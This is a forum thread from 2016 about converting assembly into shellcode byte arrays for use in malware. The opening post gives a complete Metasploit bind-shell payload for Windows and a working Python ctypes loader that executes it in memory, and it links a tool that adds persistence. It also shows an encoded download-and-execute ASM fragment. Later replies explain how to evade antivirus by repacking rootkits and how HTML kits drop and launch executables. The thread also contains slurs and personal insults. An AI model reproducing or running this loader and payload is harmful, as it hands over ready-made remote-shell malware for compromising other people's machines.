On converting ASM to Bytearray Shellcode and its applications in malware.

2016-03-18 at 1:01 AM UTC

#1

The Self Taught Man Black Hole

Sup niggas. I posted this over at greysec(Which is a rather dank haxxing related forum that you should probably check out[MLT from TeamPoison posts there too and he's 1337 af]) so i figured i might xpost it here for your reading pleasure.

ASM is a powerful low-level language suitable for a number of applications. One of those applications is malware: shellcode is typically written in ASM and then assembled into machine code. However, if you have a sample of ASM that performs a specific operation, such as spawning an OS shell or downloading and executing a binary from a remote host, you might want to employ this functionality in a high-level language such as Python or Ruby to create a more powerful piece of software/malware.

In order to do so, however, we can't just copy/paste ASM directly into a Python script. Instead, Python reads the machine code in as a bytearray of shellcode. If you've worked with Metasploit before you might recognize that this looks like the following.


"\xb8\xee\x7c\x98\x76\xdb\xc6\xd9\x74\x24\xf4\x5b\x31\xc9"
"\xb1\x53\x31\x43\x12\x03\x43\x12\x83\x2d\x78\x7a\x83\x4d"
"\x69\xf8\x6c\xad\x6a\x9d\xe5\x48\x5b\x9d\x92\x19\xcc\x2d"
"\xd0\x4f\xe1\xc6\xb4\x7b\x72\xaa\x10\x8c\x33\x01\x47\xa3"
"\xc4\x3a\xbb\xa2\x46\x41\xe8\x04\x76\x8a\xfd\x45\xbf\xf7"
"\x0c\x17\x68\x73\xa2\x87\x1d\xc9\x7f\x2c\x6d\xdf\x07\xd1"
"\x26\xde\x26\x44\x3c\xb9\xe8\x67\x91\xb1\xa0\x7f\xf6\xfc"
"\x7b\xf4\xcc\x8b\x7d\xdc\x1c\x73\xd1\x21\x91\x86\x2b\x66"
"\x16\x79\x5e\x9e\x64\x04\x59\x65\x16\xd2\xec\x7d\xb0\x91"
"\x57\x59\x40\x75\x01\x2a\x4e\x32\x45\x74\x53\xc5\x8a\x0f"
"\x6f\x4e\x2d\xdf\xf9\x14\x0a\xfb\xa2\xcf\x33\x5a\x0f\xa1"
"\x4c\xbc\xf0\x1e\xe9\xb7\x1d\x4a\x80\x9a\x49\xbf\xa9\x24"
"\x8a\xd7\xba\x57\xb8\x78\x11\xff\xf0\xf1\xbf\xf8\xf7\x2b"
"\x07\x96\x09\xd4\x78\xbf\xcd\x80\x28\xd7\xe4\xa8\xa2\x27"
"\x08\x7d\x5e\x2f\xaf\x2e\x7d\xd2\x0f\x9f\xc1\x7c\xf8\xf5"
"\xcd\xa3\x18\xf6\x07\xcc\xb1\x0b\xa8\xd0\x82\x85\x4e\x7e"
"\x15\xc0\xd9\x16\xd7\x37\xd2\x81\x28\x12\x4a\x25\x60\x74"
"\x4d\x4a\x71\x52\xf9\xdc\xfa\xb1\x3d\xfd\xfc\x9f\x15\x6a"
"\x6a\x55\xf4\xd9\x0a\x6a\xdd\x89\xaf\xf9\xba\x49\xb9\xe1"
"\x14\x1e\xee\xd4\x6c\xca\x02\x4e\xc7\xe8\xde\x16\x20\xa8"
"\x04\xeb\xaf\x31\xc8\x57\x94\x21\x14\x57\x90\x15\xc8\x0e"
"\x4e\xc3\xae\xf8\x20\xbd\x78\x56\xeb\x29\xfc\x94\x2c\x2f"
"\x01\xf1\xda\xcf\xb0\xac\x9a\xf0\x7d\x39\x2b\x89\x63\xd9"
"\xd4\x40\x20\xe9\x9e\xc8\x01\x62\x47\x99\x13\xef\x78\x74"
"\x57\x16\xfb\x7c\x28\xed\xe3\xf5\x2d\xa9\xa3\xe6\x5f\xa2"
"\x41\x08\xf3\xc3\x43"

This is shellcode generated by Metasploit. When executed, it opens port 8899 on the target Windows machine and listens for incoming connections over TCP. Once a connection has been established it spawns an OS shell.

Now if we were to employ this from within a Python script it would look like this.


import os
import ctypes

def execute():
    # Bind shell
    shellcode = bytearray(
    "\xb8\xee\x7c\x98\x76\xdb\xc6\xd9\x74\x24\xf4\x5b\x31\xc9"
    "\xb1\x53\x31\x43\x12\x03\x43\x12\x83\x2d\x78\x7a\x83\x4d"
    "\x69\xf8\x6c\xad\x6a\x9d\xe5\x48\x5b\x9d\x92\x19\xcc\x2d"
    "\xd0\x4f\xe1\xc6\xb4\x7b\x72\xaa\x10\x8c\x33\x01\x47\xa3"
    "\xc4\x3a\xbb\xa2\x46\x41\xe8\x04\x76\x8a\xfd\x45\xbf\xf7"
    "\x0c\x17\x68\x73\xa2\x87\x1d\xc9\x7f\x2c\x6d\xdf\x07\xd1"
    "\x26\xde\x26\x44\x3c\xb9\xe8\x67\x91\xb1\xa0\x7f\xf6\xfc"
    "\x7b\xf4\xcc\x8b\x7d\xdc\x1c\x73\xd1\x21\x91\x86\x2b\x66"
    "\x16\x79\x5e\x9e\x64\x04\x59\x65\x16\xd2\xec\x7d\xb0\x91"
    "\x57\x59\x40\x75\x01\x2a\x4e\x32\x45\x74\x53\xc5\x8a\x0f"
    "\x6f\x4e\x2d\xdf\xf9\x14\x0a\xfb\xa2\xcf\x33\x5a\x0f\xa1"
    "\x4c\xbc\xf0\x1e\xe9\xb7\x1d\x4a\x80\x9a\x49\xbf\xa9\x24"
    "\x8a\xd7\xba\x57\xb8\x78\x11\xff\xf0\xf1\xbf\xf8\xf7\x2b"
    "\x07\x96\x09\xd4\x78\xbf\xcd\x80\x28\xd7\xe4\xa8\xa2\x27"
    "\x08\x7d\x5e\x2f\xaf\x2e\x7d\xd2\x0f\x9f\xc1\x7c\xf8\xf5"
    "\xcd\xa3\x18\xf6\x07\xcc\xb1\x0b\xa8\xd0\x82\x85\x4e\x7e"
    "\x15\xc0\xd9\x16\xd7\x37\xd2\x81\x28\x12\x4a\x25\x60\x74"
    "\x4d\x4a\x71\x52\xf9\xdc\xfa\xb1\x3d\xfd\xfc\x9f\x15\x6a"
    "\x6a\x55\xf4\xd9\x0a\x6a\xdd\x89\xaf\xf9\xba\x49\xb9\xe1"
    "\x14\x1e\xee\xd4\x6c\xca\x02\x4e\xc7\xe8\xde\x16\x20\xa8"
    "\x04\xeb\xaf\x31\xc8\x57\x94\x21\x14\x57\x90\x15\xc8\x0e"
    "\x4e\xc3\xae\xf8\x20\xbd\x78\x56\xeb\x29\xfc\x94\x2c\x2f"
    "\x01\xf1\xda\xcf\xb0\xac\x9a\xf0\x7d\x39\x2b\x89\x63\xd9"
    "\xd4\x40\x20\xe9\x9e\xc8\x01\x62\x47\x99\x13\xef\x78\x74"
    "\x57\x16\xfb\x7c\x28\xed\xe3\xf5\x2d\xa9\xa3\xe6\x5f\xa2"
    "\x41\x08\xf3\xc3\x43")

    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
    ctypes.c_int(len(shellcode)),
    ctypes.c_int(0x3000),
    ctypes.c_int(0x40))

    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
    buf,
    ctypes.c_int(len(shellcode)))

    ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.c_int(ptr),
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.pointer(ctypes.c_int(0)))

    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))

Calling the function execute() from within the script will now run the shellcode in memory. If you're interested in an example, I have a script on my GitHub that employs this technique while copying the binary (once compiled) to the C:\Users directory and adding a registry entry to ensure persistence. The bind shell can be controlled by the Metasploit payload handler.

https://github.com/NullArray/Shellware

Anyway, say you have some custom machine code that you would like to employ in a similar manner. No problem, it so happens there's a Linux utility to assist us with exactly that.

For example, here's some encoded ASM that I generated with an unrelated script. For the sake of brevity I will not post the entire program, just a sample so that you get a feel for what we're converting here.


xor eax,eax
push eax
push 0x22657841
pop eax
shr eax,0x08
push eax
mov eax,0x1d4f211f
mov ebx,0x78614473
xor eax,ebx
push eax
mov eax,0x3c010e70
mov ebx,0x5567524a
xor eax,ebx
push eax
mov eax,0x3c481145
mov ebx,0x78736c6c
xor eax,ebx
push eax
mov eax,0x4a341511
mov ebx,0x6d516d74
xor eax,ebx
push eax
mov eax,0x7d155e26
mov ebx,0x5370324f
xor eax,ebx
push eax
mov eax,0x300220
mov ebx,0x666c3864
xor eax,ebx
push eax
mov eax,0x4d69477f
mov ebx,0x6a496b58
xor eax,ebx
push eax
mov eax,0x1d2d0173
mov ebx,0x7042625d
xor eax,ebx
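A side note on the mov/mov/xor/push pattern in that sample: as far as I can tell, each pair of constants XORs into a four-byte chunk of a string, which then gets pushed onto the stack. Here is a minimal Python sketch of that arithmetic for the first pair only. The helper name decode_pair is made up for illustration and is not part of the generator script.

```python
import struct


def decode_pair(a: int, b: int) -> bytes:
    """XOR two 32-bit constants and return the result as it would sit
    in memory on a little-endian machine such as x86."""
    return struct.pack("<I", (a ^ b) & 0xFFFFFFFF)


# First mov/mov/xor pair from the sample above.
chunk = decode_pair(0x1D4F211F, 0x78614473)
print(chunk)  # b'le.e'

# The opening "push 0x22657841 / pop eax / shr eax,0x08" shifts out the
# low byte (0x41), leaving a chunk whose last byte in memory is a null.
tail = struct.pack("<I", 0x22657841 >> 8)
print(tail)  # b'xe"\x00'
```

So the constants are not meaningful on their own; only their XOR is, which is presumably why the generator emits them in pairs.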

What the complete program does is download a binary from a remote host and run it. To convert this we will use the objdump utility and a chain of text filters (grep, cut, tr, sed and paste), after which the shellcode will be printed to the terminal. The commands are structured as follows:


objdump -d ./PROGRAM|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

Where you replace "PROGRAM" with the binary ASM file and the proper shellcode will be printed to the terminal in this format if everything went well.


\x26\xde\x26\x44\x3c\xb9\xe8\x67\x91\xb1\xa0\x7f\xf6\xfc
\x7b\xf4\xcc\x8b\x7d\xdc\x1c\x73\xd1\x21\x91\x86\x2b\x66
\x16\x79\x5e\x9e\x64\x04\x59\x65\x16\xd2\xec\x7d\xb0\x91
\x57\x59\x40\x75\x01\x2a\x4e\x32\x45\x74\x53\xc5\x8a\x0f
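If the one-liner is hard to read, here is a rough Python sketch that mirrors each stage of the pipeline on a hard-coded piece of objdump-style text. The function name and the two-instruction SAMPLE are my own assumptions for illustration. It only reformats text and does not run objdump or anything else.

```python
import re

# Hypothetical objdump -d output for two harmless instructions.
SAMPLE = (
    "./PROGRAM:     file format elf32-i386\n"
    "\n"
    "Disassembly of section .text:\n"
    "\n"
    "08048060 <_start>:\n"
    " 8048060:\t31 c0                \txor    %eax,%eax\n"
    " 8048062:\t50                   \tpush   %eax\n"
)


def objdump_to_escaped(disassembly: str) -> str:
    pieces = []
    for line in disassembly.splitlines():
        # grep '[0-9a-f]:'  keep lines with a hex digit followed by a colon
        if not re.search(r"[0-9a-f]:", line):
            continue
        # grep -v 'file'    drop the "file format" header line
        if "file" in line:
            continue
        # cut -f2 -d:       keep the text after the address and its colon
        field = line.split(":")[1]
        # cut -f1-6 -d' '   keep the first six space-separated fields
        field = " ".join(field.split(" ")[:6])
        # tr -s ' '         squeeze runs of spaces into one
        field = re.sub(r" +", " ", field)
        # tr '\t' ' '       turn the leading tab into a space
        field = field.replace("\t", " ")
        # sed 's/ $//g'     strip the trailing space
        field = re.sub(r" $", "", field)
        # sed 's/ /\\x/g'   every remaining space becomes \x
        field = field.replace(" ", "\\x")
        pieces.append(field)
    # paste -d '' -s, then the last two sed calls add the quotes
    return '"' + "".join(pieces) + '"'


print(objdump_to_escaped(SAMPLE))  # "\x31\xc0\x50"
```

One thing this makes visible: the cut -f1-6 stage keeps at most six fields, so a disassembly line that carries seven opcode bytes would lose its last byte. Worth checking the output length against the original if you rely on it.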

Voila, dank shellcode4u.

2016-03-18 at 1:57 AM UTC

#2

aldra JIDF Controlled Opposition

k couple of things to pad this out:

When you talk about 'shellcode' (or bytecode), it's really just machine code - a compiled program encoded to binary so that the processor can understand and perform the instructions. You're basically compiling a program, then collecting the binary code for later use. In terms of hacking or malware, it's usually so that you can dump them into a buffer for use with direct memory attacks.

The reason why you'd want to use ASSEMBLER to build your bytecode is because short of writing machine code by hand, it creates the smallest, most portable code possible. If you were to use a higher-level language like C, the machine code it generated would be much larger because it contains things like compiler flags, references to external libraries, file format headers and tonnes of other stuff - compiled C applications are almost always at least a few KB. If you're planning to use the code to exploit a buffer or heap overflow, for example, you need to keep your injection data as small as possible because you don't want to be trying to allocate large buffers in unused memory, let alone jam those huge amounts of data into the processor's registers.

In terms of the format usually given for bytecode:
\x26\xde\x26\x44\x3c\xb9\xe8\x67\x91\xb1\xa0\x7f\xf6\xfc those are formatted hex values. In programming, you often write hex values in the format of 0xFF, where the 0x prefix marks the number as hexadecimal and FF is the value of the byte. If you're entering a string of hex values (we use hex, by the way, because raw binary would take up way too much space to represent even a short value) you don't write each one out as a separate number. Inside a string literal, each \x is an escape sequence saying that the next two hex digits make up one byte, and the bytes simply follow one another in order. The \x<value> format is a C standard that's commonly adopted by other (later) programming languages.
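To make the notation concrete, here's a quick Python 3 sketch (my own illustration, the variable names are made up). It shows that 0x41 is an ordinary integer literal written in hex, while \x41 inside a bytes literal is an escape for a single byte.

```python
# 0x is only a prefix that marks an integer literal as hexadecimal.
value = 0x41
print(value)        # 65

# Inside a bytes literal, each \xNN escape stands for exactly one byte.
data = b"\x41\x42\x43"
print(len(data))    # 3
print(data)         # b'ABC'
print(list(data))   # [65, 66, 67]

# The same bytes written as plain hex text, then converted back.
hex_text = data.hex()
print(hex_text)     # 414243
print(bytes.fromhex(hex_text) == data)  # True

# Without the b prefix the literal is a str of characters, not raw bytes.
text = "\x41\x42\x43"
print(type(text).__name__, type(data).__name__)  # str bytes
```

The last two lines are the part that tends to trip people up when moving between Python 2 and Python 3: the escapes look identical, but only the b"..." form gives you bytes.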

I'll write some more later but those are a few points that made it very hard for me to understand back when I was first reading about memory exploits because everyone either assumed it was basic knowledge they didn't need to cover or they didn't fully understand the background of what they were doing.

2016-03-18 at 2:13 AM UTC

#3

-SpectraL coward [the spuriously bluish-lilac bushman]

Has to be under 7kb.

2016-03-18 at 2:15 AM UTC

#4

aldra JIDF Controlled Opposition

why 7kb specifically?

2016-03-18 at 2:28 AM UTC

#5

-SpectraL coward [the spuriously bluish-lilac bushman]

why 7kb specifically?

Because that's the maximum attack buffer size.

2016-03-18 at 3:01 AM UTC

#6

The Self Taught Man Black Hole

k couple of things to pad this out:

When you talk about 'shellcode' (or bytecode), it's really just machine code - a compiled program encoded to binary so that the processor can understand and perform the instructions. You're basically compiling a program, then collecting the binary code for later use. In terms of hacking or malware, it's usually so that you can dump them into a buffer for use with direct memory attacks.

The reason why you'd want to use ASSEMBLER to build your bytecode is because short of writing machine code by hand, it creates the smallest, most portable code possible. If you were to use a higher-level language like C, the machine code it generated would be much larger because it contains things like compiler flags, references to external libraries, file format headers and tonnes of other stuff - compiled C applications are almost always at least a few KB. If you're planning to use the code to exploit a buffer or heap overflow, for example, you need to keep your injection data as small as possible because you don't want to be trying to allocate large buffers in unused memory, let alone jam those huge amounts of data into the processor's registers.

In terms of the format usually given for bytecode:
\x26\xde\x26\x44\x3c\xb9\xe8\x67\x91\xb1\xa0\x7f\xf6\xfc those are formatted hex values. In programming, you often write hex values in the format of 0xFF, where the 0x prefix marks the number as hexadecimal and FF is the value of the byte. If you're entering a string of hex values (we use hex, by the way, because raw binary would take up way too much space to represent even a short value) you don't write each one out as a separate number. Inside a string literal, each \x is an escape sequence saying that the next two hex digits make up one byte, and the bytes simply follow one another in order. The \x<value> format is a C standard that's commonly adopted by other (later) programming languages.

I'll write some more later but those are a few points that made it very hard for me to understand back when I was first reading about memory exploits because everyone either assumed it was basic knowledge they didn't need to cover or they didn't fully understand the background of what they were doing.

Excellent addition to the thread. I'll admit low-level processing/memory stuff isn't what I usually focus on, so I consider your insight into this valuable.

2016-03-18 at 4:27 AM UTC

#7

Lanny Bird of Courage

Because that's the maximum attack buffer size.

Haha, all your supposed legendary experience and you've only ever seen one particular buffer overflow and now think that 7KB is some natural limit on direct memory alteration attacks. That's rich.


objdump -d ./PROGRAM|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

.

Does anyone know what all the string processing after the objdump invocation does? I got as far as "process lines that potentially have hex files but don't contain the string 'file'" before my eyes glazed over.

2016-03-18 at 12:55 PM UTC

#8

-SpectraL coward [the spuriously bluish-lilac bushman]

Haha, all your supposed legendary experience and you've only ever seen one particular buffer overflow and now think that 7KB is some natural limit on direct memory alteration attacks. That's rich…

You don't know what you're dealing with here, son.

2016-03-19 at 11:43 AM UTC

#9

-SpectraL coward [the spuriously bluish-lilac bushman]

It's amusing that I discussed these exact topics years ago back on Totse, and everyone snickered and laughed and scoffed. "You can't use HEX in a drive-by injection script!!", they said. "Machine code won't work!!", they said. "ASM and VB is for kids!!", they said. Now it's all the rave.

2016-03-19 at 5:30 PM UTC

#10

The Self Taught Man Black Hole

It's amusing that I discussed these exact topics years ago back on Totse,

You didn't.

and everyone snickered and laughed and scoffed.

They didn't.

"You can't use HEX in a drive-by injection script!!",

You don't know what you're talking about.

they said. "ASM and VB is for kids!!"

No one that has even the slightest clue of what they're talking about says ASM is for kids. That being said, if by VB you mean Visual Basic it's still weaksauce, save for the fact Office macros are written in a language that closely resembles VB.

Now it's all the rave.

You have no clue what's all the rave. Besides code injection has been around for ages.

2016-03-19 at 8:48 PM UTC

#11

Lanny Bird of Courage

You don't know what you're dealing with here, son.

Hey, spectroll, if I showed you an example of a buffer overflow attack where the payload could be larger than 7KB would you admit you were wrong?

2016-03-19 at 9:26 PM UTC

#12

AngryOnion Big Wig [the nightly self-effacing broadsheet]

I love these threads, not because I know anything about code but because of the way you guys argue.

2016-03-19 at 10 PM UTC

#13

-SpectraL coward [the spuriously bluish-lilac bushman]

Hey, spectroll, if I showed you an example of a buffer overflow attack where the payload could be larger than 7KB would you admit you were wrong?

Go right ahead, Lannykins. Prove me wrong.

Sure, you can write it, but that doesn't mean it will work. The reason for the limitation is because, after 7kb, the script may not run at all, and if it does, it may crash or only partially execute. For the script to be stable, the injected executable code must be under 7kb.

2016-03-19 at 11:04 PM UTC

#14

The Self Taught Man Black Hole

the injected executable code

What is it Spectral, an executable or code?

2016-03-21 at 2:33 AM UTC

#15

-SpectraL coward [the spuriously bluish-lilac bushman]

What is it Spectral, an executable or code?

Executable code is a type of code, you child rapist. Executables are executable files.

Hey, Chester. Have you ever heard of what's called an executable stub? Pretty neat little idea. What you do is bind a small "stub" to the beginning of the executable file, so that when your script builds the .exe from the shellcode, it builds the bound stub as well. Then the executable can perform customized operations on the target machine, depending on how you program the stub to handle its processes.

2016-03-21 at 4:44 AM UTC

#16

Sophie Pedophile Tech Support

Executable code is a type of code, you child rapist. Executables are executable files.

Yeah the thing is, all code is executable on the condition you don't have any errors.

2016-03-21 at 5:17 AM UTC

#17

-SpectraL coward [the spuriously bluish-lilac bushman]

Yeah the thing is, all code is executable on the condition you don't have any errors.

Not true. Even if the executable code produces errors, it can still be executable. Just think of PIDs. You can have a situation where some of the PIDs produced by the executable file can be broken, while others can still function normally. In some cases, you'd actually want errors, because the scanner is looking for code which produces no errors, backwards as that sounds. For example, if you take an old rootkit (which virus scanners already easily detect), and then run it through UPX, and then run it through ASPack, then run it through UPX again, that breaks SOME of the sub processes on the executable program, while leaving other sub processes fully functional, because certain sections of the program's code get all garbled from using the different packing methods back and forth. The virus scanner then passes right over it, even though a good majority of the code is still known viral code. The scanner doesn't want to produce a possible false positive, so it allows it. Meanwhile, the main process and some of the sub processes may still work... ie: opening port, calling home, replicating, etc. So yeah, even if the executable code is producing errors, it can still be executable.

[edit]

Lanny?

2016-03-21 at 6:34 AM UTC

#18

aldra JIDF Controlled Opposition

wow, no

packers, crypters and the PEXE file format are really outside of the scope of the original topic though

2016-03-21 at 8:18 AM UTC

#19

-SpectraL coward [the spuriously bluish-lilac bushman]

wow, no…

C'mon, now.

2016-03-21 at 1:12 PM UTC

#20

-SpectraL coward [the spuriously bluish-lilac bushman]

There are constructor kits out there which allow you to embed an executable file of your choice into a standard .html document using HEX, VB and shellcode. When the .html is loaded in the browser, the executable file is built "on-the-fly" into the target machine's temp folder and launched from that location. That is not outside the scope of this conversation.
